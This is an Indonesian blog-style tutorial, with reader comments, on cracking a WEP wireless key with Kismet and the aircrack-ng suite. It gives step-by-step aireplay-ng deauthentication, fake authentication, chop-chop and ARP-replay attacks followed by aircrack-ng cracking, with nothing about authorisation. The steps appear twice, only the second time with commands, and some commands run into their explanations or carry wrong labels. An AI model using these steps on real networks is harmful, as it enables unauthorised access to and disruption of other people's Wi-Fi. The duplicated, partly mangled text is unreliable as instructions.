Cracking WEP Keys Step By Step
1. Jalankan Kismet

2. Cari channel yang memungkinkan client nya, dengan menekan tombol S lalu F, dan pilih atas bawah dan tekan C.
3. Tutup kismet.
4. Jalankan airodump
-w channel6: menulis file dump ke file dengan nama cahannel6
ath0: interface

5. Pastikan fixed channel sudah sesuai dengan cahnnel yang ingin di dump. Atau fixed channel tidak muncul jika ath0 sudah berada di channel yang benar.
6. Kita akan melakukan 4 serangan yang ada di aireplay-ng. Pertama
Deauthentication Attack
0: unlimited attack
-a BSSID_AP: Access Point mac address, liat airodump-ng
-c STATIONID_CLIENT: client station mac address
ath0: interface

7. Fake Authentication
1: 1x attack count
-a BSSID_AP: Access Point mac address, liat airodump-ng
-c STATIONID_CLIENT: client station mac address
ath0: interface

8. Chop-Chop Attack
ath0: interface

tekan y jika aireplay-ng sudah mencapture data. dan tunggu / biarkan proses bekerja.
9. Arp-Replay Attack
0: unlimited attack count
-b BSSID_AP: Access Point mac address, liat airodump-ng
-h STATIONID_CLIENT: client station mac address
ath0: interface

10. Tunggu paling tidak 30 menit atau sampe #data di airodump-ng mencapai => 80.000 packet data

11. aircrack-ng Cracking the password
Setelah dapet dump kita akan mengcrack data .cap yang telah di save,
close semua process diatas CTRL+Q, buka konsole baru
ketikkan:
-f 4: bruteforce fudge factor 4, see –help
channel6-01.cap: file capture airodump

13. pilih network target, dengan ivs paling tinggi, dalam kasus ini index number 1
14. lalu aircrack-ng akan mengcrack password tersebut

finish. key ditemukan
[C0:B4:D1:B4:C4]
pisahkan titik dua (:) untuk menghubungkan key password tersebut.

2. Cari channel yang memungkinkan client nya, dengan menekan tombol S lalu F, dan pilih atas bawah dan tekan C.
3. Tutup kismet.
4. Jalankan airodump
# airodump-ng -c 6 -w channel6 ath0-c 6: channel 6
-w channel6: menulis file dump ke file dengan nama cahannel6
ath0: interface

5. Pastikan fixed channel sudah sesuai dengan cahnnel yang ingin di dump. Atau fixed channel tidak muncul jika ath0 sudah berada di channel yang benar.
6. Kita akan melakukan 4 serangan yang ada di aireplay-ng. Pertama
Deauthentication Attack
# aireplay-ng -0 0 -a BSSID_AP -c STATIONID_CLIENT ath0-0: Deauthtentication Attack, see –help
0: unlimited attack
-a BSSID_AP: Access Point mac address, liat airodump-ng
-c STATIONID_CLIENT: client station mac address
ath0: interface

7. Fake Authentication
# aireplay-ng -1 1 -a BSSID_AP -h STATIONID_CLIENT ath0-1: Fake Authentication Attack, see –help
1: 1x attack count
-a BSSID_AP: Access Point mac address, liat airodump-ng
-c STATIONID_CLIENT: client station mac address
ath0: interface

8. Chop-Chop Attack
# aireplay-ng -4 ath0-4: decrypt/chopchop attack, see –help
ath0: interface

tekan y jika aireplay-ng sudah mencapture data. dan tunggu / biarkan proses bekerja.
9. Arp-Replay Attack
# aireplay-ng -3 0 -b BSSID_AP -h STATIONID_CLIENT ath0-3: Fake Authentication Attack, see –help
0: unlimited attack count
-b BSSID_AP: Access Point mac address, liat airodump-ng
-h STATIONID_CLIENT: client station mac address
ath0: interface

10. Tunggu paling tidak 30 menit atau sampe #data di airodump-ng mencapai => 80.000 packet data

11. aircrack-ng Cracking the password
Setelah dapet dump kita akan mengcrack data .cap yang telah di save,
close semua process diatas CTRL+Q, buka konsole baru
ketikkan:
# aircrack-ng -0 -n 128 -f 4 channel6-01.cap-n 128: WEP Key Length (128bit), see –help
-f 4: bruteforce fudge factor 4, see –help
channel6-01.cap: file capture airodump

13. pilih network target, dengan ivs paling tinggi, dalam kasus ini index number 1
14. lalu aircrack-ng akan mengcrack password tersebut

finish. key ditemukan
[C0:B4:D1:B4:C4]
pisahkan titik dua (:) untuk menghubungkan key password tersebut.
syarat2nya apa aj nih klo mw jajal tutor ini???
kynya seru juga nih,,,
tp,,chipset gw intel punyaaa,,,,,
Reply
Thanks for share
Reply